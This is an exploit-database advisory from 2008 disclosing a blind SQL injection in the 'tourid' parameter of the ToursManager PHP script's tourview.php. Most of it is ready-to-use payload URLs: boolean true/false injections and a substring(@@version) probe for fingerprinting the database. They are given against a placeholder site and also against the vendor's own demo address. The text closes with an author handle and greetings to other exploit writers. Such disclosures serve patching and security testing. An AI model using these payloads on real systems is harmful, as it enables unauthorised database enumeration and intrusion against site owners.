[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ToursManager (tourview.php tourid) Blind SQL Injection Vulnerability
# Published : 2008-11-20
# Author : XaDoS
# Previous Title : Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability
# Next Title : NatterChat 1.1 Remote Admin Bypass Vulnerability
[>] Name:--> ToursManager PhP Script <= Blind Sql Injection
[>] Discovered by:--> XaDoS
[>] ContacT m&:--> xados[at]hotmail.it
[>] Site:--> http://www.toursmanager.com
#########
[a–?] ?£XpLoIT:
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1-- (true)
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0-- (false)
Version:
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5 (true)
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4 (false)
V=> 5.x.x XD
#########
[a–?] D&M0:
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5
#########
[a–?] Th4Nks T0:
> Boom3rang </ (very kind) ;-)
> Langy </
> Str0ke </
#########
# www.Syue.com [2008-11-20]